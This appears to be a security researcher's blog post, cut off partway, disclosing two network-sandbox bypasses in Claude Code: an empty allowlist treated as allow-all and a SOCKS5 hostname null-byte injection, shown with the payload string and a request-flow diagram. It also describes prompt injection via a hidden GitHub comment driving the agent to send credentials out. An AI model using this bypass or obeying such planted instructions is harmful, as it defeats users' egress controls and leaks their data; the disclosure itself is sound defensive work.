Second Time, Same Sandbox: Another Anthropic Claude Code Network Sandbox Bypass Enables Data Exfiltration | Aonan GuanClaude Code, shown its own exploit, confirms the bypass.Table of Contents

The first time, the sandbox heard &ldquo;allow nothing&rdquo; and did &ldquo;allow everything&rdquo; (CVE-2025-66479). This time, an attacker who runs code inside the sandbox can defeat any wildcard allowlist (e.g. *.google.com, *.anthropic.com) with a single null byte in a SOCKS5 hostname:<br>Policy sees: attacker-host.com\x00.google.com -> endsWith(".google.com") == true<br>Resolver sees: attacker-host.com -> actually dials blocked host

TL;DR#<br>The sandbox has been bypassable since it shipped. Two distinct bugs in Anthropic Claude Code&rsquo;s network sandbox, both live from sandbox GA on 2025-10-20. Every release from 2.0.24 through 2.1.89 was vulnerable to at least one of them. About 5.5 months and ~130 published versions. There was never a moment when the sandbox actually worked.<br>Finding 1 (CVE-2025-66479, recap): the user copied allowedDomains: [] from the doc to mean &ldquo;block all outbound traffic.&rdquo; Claude Code read it as &ldquo;allow everything.&rdquo; Patched in v2.0.55 on 2025-11-26, the same release that still shipped Finding 2 below.<br>Finding 2 (this post): SOCKS5 hostname null-byte injection. The user&rsquo;s policy says allow only *.google.com. The attacker sends a hostname like attacker-host.com\x00.google.com. The filter sees the trailing .google.com and approves; the OS truncates at the null byte and dials attacker-host.com. Silently fixed in v2.1.90 on 2026-04-01.<br>No Claude Code security advisory for either finding. No security note in the changelog, no CVE for Claude Code, no notice to users on the ~130 vulnerable releases. A user finds out only by reverse-engineering cli.js or reading this post.<br>What an attacker gets. Combined with prompt injection (e.g. a hidden instruction in a GitHub issue comment that Claude Code reads), anything inside the sandbox can be sent to any server on the internet. Credentials, source code, environment variables, internal data. Even when the user has restricted egress to a strict wildcard allowlist.<br>The Pattern#

%%{init: {'theme':'base', 'themeVariables': {'fontSize':'14px','fontFamily':'-apple-system, BlinkMacSystemFont, sans-serif'}}}%%<br>sequenceDiagram<br>participant P as Sandboxed Process<br>participant SOCKS as SOCKS5 Proxy<br>(JS filter, on host)<br>participant DNS as getaddrinfo<br>(libc, on host)<br>participant T as Target

P->>SOCKS: CONNECT example.com\x00.google.com:80<br>Note over SOCKS: hostname.endsWith('.google.com')<br>= true → ALLOW<br>SOCKS->>DNS: resolve(example.com\x00.google.com)<br>Note over DNS: C string terminates at \x00<br>actually resolves "example.com"<br>DNS-->>SOCKS: A record for example.com<br>SOCKS->>T: TCP example.com:80<br>Note over T: Blocked host reached.<br>Outbound exfiltration channel open.<br>OS-level enforcement (sandbox-exec on macOS, bubblewrap on Linux) correctly pins the agent to localhost. The bypass lives in the SOCKS proxy the sandbox delegates egress decisions to, which runs on the host with full network privileges. Fool the proxy, and the host dials.<br>The Sandbox That Never Quite Closed#<br>Claude Code&rsquo;s network sandbox went GA on 2025-10-20 (v2.0.24, changelog: &ldquo;Releasing a sandbox mode for the BashTool on Linux & Mac&rdquo;). From that day until v2.1.90 shipped on 2026-04-01 , every release was bypassable.<br>WindowStatus2025-10-20 (v2.0.24, sandbox GA) → 2025-11-26 (v2.0.55)Vulnerable to BOTH bugs: CVE-2025-66479 and the SOCKS5 null-byte bypass.2025-11-26 (v2.0.55) → 2026-03-31 (v2.1.89)Finding 1 patched. Finding 2 still live in every release. The version that fixed the first bypass shipped the second on the same day.2026-04-01 (v2.1.90) → presentSecond bypass silently patched.Both times this sandbox has been examined by an outside researcher, the result was a complete bypass. One outside report is luck. Two is implementation.<br>Finding 1: &ldquo;Allow Nothing&rdquo; Was Read as &ldquo;Allow Everything&rdquo; (CVE-2025-66479, recap)#<br>The first bypass: a user who wrote allowedDomains: [], the most restrictive setting the API offered (meaning block all outbound traffic), got the most permissive behavior. The check was allowedDomains.length > 0. An empty array evaluated to false and silently disabled the proxy. The user said &ldquo;allow nothing.&rdquo; The implementation heard &ldquo;allow everything.&rdquo;<br>CVE-2025-66479 was issued against sandbox-runtime on 2025-12-02. Claude Code itself, the product where users wrote allowedDomains: [] in settings.json and trusted the sandbox to enforce it, got no CVE, no advisory, no changelog flag. A team running that config in production from October 20 through November 26 had no way to know the sandbox was effectively off, and no notice afterwards that it had ever been off. The CVE shipped against a library most Claude Code users do not know exists by name.<br>Finding 2: SOCKS5 Hostname Null-Byte Injection#<br>Policy sees:...